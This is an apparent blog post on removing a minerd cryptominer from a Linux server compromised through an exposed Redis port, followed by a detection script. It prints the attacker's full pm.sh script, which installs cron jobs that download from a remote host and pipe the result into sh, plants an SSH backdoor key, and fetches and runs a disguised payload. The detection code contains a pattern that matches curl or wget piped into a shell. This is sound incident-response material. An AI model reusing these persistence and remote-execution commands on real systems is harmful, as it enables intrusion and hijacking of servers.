I had carelessly installed a Redis service and opened its default port to the whole network, assuming that this server had no public IP. It turned out that it did, and by the time I noticed it was too late to do anything but regret it.
One day I found the CPU load abnormally high: a minerd process was eating most of the CPU. A quick Google search made it clear that I had been compromised.
Here's the cleanup process.
Step one
1. Immediately stop the Redis service, fix the port exposure, and set a password.
2. Following the information found online, delete the two crontab files:
sudo rm /var/spool/cron/root
sudo rm /var/spool/cron/crontabs/root
3. Know your enemy: study the virus's initial script, pm.sh (28 lines). Cleaned up from the vim capture, it reads as follows (the attacker's public key is unreadable in the capture and is shown as a placeholder):
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin
echo "*/10 * * * * curl -fsSL http://r.chanstring.com/pm.sh?0706 | sh" > /var/spool/cron/root
mkdir -p /var/spool/cron/crontabs
echo "*/10 * * * * curl -fsSL http://r.chanstring.com/pm.sh?0706 | sh" > /var/spool/cron/crontabs/root
if [ ! -f "/root/.ssh/KHK75NEOiq" ]; then
    mkdir -p ~/.ssh
    rm -f ~/.ssh/authorized_keys*
    echo "ssh-rsa <attacker public key, garbled in the capture> root" > ~/.ssh/KHK75NEOiq
    echo "PermitRootLogin yes" >> /etc/ssh/sshd_config
    echo "RSAAuthentication yes" >> /etc/ssh/sshd_config
    echo "PubkeyAuthentication yes" >> /etc/ssh/sshd_config
    echo "AuthorizedKeysFile .ssh/KHK75NEOiq" >> /etc/ssh/sshd_config
    /etc/init.d/sshd restart
fi
if [ ! -f "/etc/init.d/ntp" ]; then
    if [ ! -f "/etc/systemd/system/ntp.service" ]; then
        mkdir -p /opt
        curl -fsSL http://r.chanstring.com/v51/lady_`uname -m` -o /opt/KHK75NEOiq33 && chmod +x /opt/KHK75NEOiq33 && /opt/KHK75NEOiq33 -install
    fi
fi
/etc/init.d/ntp start
ps auxf | grep -v grep | grep "/usr/bin/cron" | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep "/opt/cron" | awk '{print $2}' | xargs kill -9
What the script tells us
1. Delete the crontab configuration files. We already did this above; the code involved is:
echo "*/10 * * * * curl -fsSL http://r.chanstring.com/pm.sh?0706 | sh" > /var/spool/cron/root
mkdir -p /var/spool/cron/crontabs
echo "*/10 * * * * curl -fsSL http://r.chanstring.com/pm.sh?0706 | sh" > /var/spool/cron/crontabs/root
2. Delete the key the attacker planted for password-less (public-key) login:
rm -f ~/.ssh/authorized_keys*
rm -f ~/.ssh/KHK75NEOiq
You can even remove the .ssh directory entirely.
The code involved:
if [ ! -f "/root/.ssh/KHK75NEOiq" ]; then
    mkdir -p ~/.ssh
    rm -f ~/.ssh/authorized_keys*
    echo "ssh-rsa <attacker public key, garbled in the capture> root" > ~/.ssh/KHK75NEOiq
    echo "PermitRootLogin yes" >> /etc/ssh/sshd_config
    echo "RSAAuthentication yes" >> /etc/ssh/sshd_config
    echo "PubkeyAuthentication yes" >> /etc/ssh/sshd_config
    echo "AuthorizedKeysFile .ssh/KHK75NEOiq" >> /etc/ssh/sshd_config
    /etc/init.d/sshd restart
fi
Note that the script also appends four directives to /etc/ssh/sshd_config (PermitRootLogin yes, RSAAuthentication yes, PubkeyAuthentication yes, AuthorizedKeysFile .ssh/KHK75NEOiq); those lines need to be removed from sshd_config and sshd restarted, otherwise the key path stays configured even after the key file is gone.
3. Delete the /opt/ directory. Its contents were generated by the service installed in step 4.
4. Delete the service:
service ntp stop
rm /etc/init.d/ntp
rm /usr/sbin/ntp
The code involved:
if [ ! -f "/etc/init.d/ntp" ]; then
    if [ ! -f "/etc/systemd/system/ntp.service" ]; then
        mkdir -p /opt
        curl -fsSL http://r.chanstring.com/v51/lady_`uname -m` -o /opt/KHK75NEOiq33 && chmod +x /opt/KHK75NEOiq33 && /opt/KHK75NEOiq33 -install
    fi
fi
As the code shows, it downloads an 8 MB program. What that program installs, I could not tell at the time, but the next line of code gave away its whereabouts:
/etc/init.d/ntp start
This line starts a service called ntp. A Baidu search says ntp is a time-synchronisation service, but here it is in fact the virus's service: opening this init script and locating the executable it launches, /usr/sbin/ntp, showed that file to be byte-for-byte identical to the 8 MB download.
So delete that file too.
Finally
ps aux | grep minerd
Kill all the processes it finds, and the fix is done.
Half an hour later:
ps aux | grep minerd
The minerd process no longer appears.
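The checks this post walks through by hand (cron jobs that pipe a remote download into sh, the directives appended to sshd_config, the fake ntp init script whose binary matches the /opt download, and the minerd process) gathered into one POSIX sh script. This is an added example, not code from the original post: every function takes a root directory so it can run against the constructed tree built at the bottom, and the sample ps line and the stand-in for the 8 MB download are constructed.

```shell
# All functions take a root directory so they can run against the constructed
# tree below or, as root, against "/" on a live host.

cron_fetch_lines() {   # crontab lines that pipe a remote download into sh
    cat "$1/var/spool/cron/root" "$1/var/spool/cron/crontabs/root" 2>/dev/null |
        grep -cE '(curl|wget)[^|]*[|][[:space:]]*(ba)?sh' || true
}

sshd_risky_directives() {   # the sshd_config changes pm.sh appends
    awk 'tolower($1) == "permitrootlogin" && tolower($2) == "yes" { n++ }
         tolower($1) == "authorizedkeysfile" && $2 != ".ssh/authorized_keys" { n++ }
         END { print n + 0 }' "$1/etc/ssh/sshd_config" 2>/dev/null || echo 0
}

rogue_ntp_binary() {   # the post's check: /usr/sbin/ntp identical to a file in /opt
    [ -f "$1/etc/init.d/ntp" ] || { echo no; return 0; }
    for f in "$1"/opt/*; do
        [ -f "$f" ] && cmp -s "$f" "$1/usr/sbin/ntp" && { echo "yes:$f"; return 0; }
    done
    echo no
}

miner_pids() {   # PIDs of minerd processes, given `ps aux` output on stdin
    awk '$11 ~ /(^|\/)minerd$/ { print $2 }'
}

build_sample_tree() {   # constructed replica of what pm.sh leaves behind (not a real host)
    mkdir -p "$1/var/spool/cron/crontabs" "$1/etc/ssh" "$1/etc/init.d" "$1/usr/sbin" "$1/opt"
    job='*/10 * * * * curl -fsSL http://r.chanstring.com/pm.sh?0706 | sh'
    echo "$job" > "$1/var/spool/cron/root"
    echo "$job" > "$1/var/spool/cron/crontabs/root"
    printf 'PermitRootLogin yes\nAuthorizedKeysFile .ssh/KHK75NEOiq\n' > "$1/etc/ssh/sshd_config"
    : > "$1/etc/init.d/ntp"
    echo 'constructed stand-in for the 8 MB download' > "$1/opt/KHK75NEOiq33"
    cp "$1/opt/KHK75NEOiq33" "$1/usr/sbin/ntp"
}

tmp=$(mktemp -d)
build_sample_tree "$tmp"
echo "cron lines fetching remote scripts: $(cron_fetch_lines "$tmp")"        # 2
echo "risky sshd_config directives:       $(sshd_risky_directives "$tmp")"   # 2
echo "init script backed by /opt payload: $(rogue_ntp_binary "$tmp")"
printf 'root 4242 97.0 0.1 1 2 ? Ssl 10:00 5:00 /opt/minerd\n' | miner_pids  # 4242
rm -rf "$tmp"
```

On a live host, feed `ps aux | miner_pids` and point the other functions at "/" to get the same four answers for the real system.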
That is the complete, detailed process for cleaning up minerd on Linux; I hope everyone will keep supporting the Cloud Habitat Community.